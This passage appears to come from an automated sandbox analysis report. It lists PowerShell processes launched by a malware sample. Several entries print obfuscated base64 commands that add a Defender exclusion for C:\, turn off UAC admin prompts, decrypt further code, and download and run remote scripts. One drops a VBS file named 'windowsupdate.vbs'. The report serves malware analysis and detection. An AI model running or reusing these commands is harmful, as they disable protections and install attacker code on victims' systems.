0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1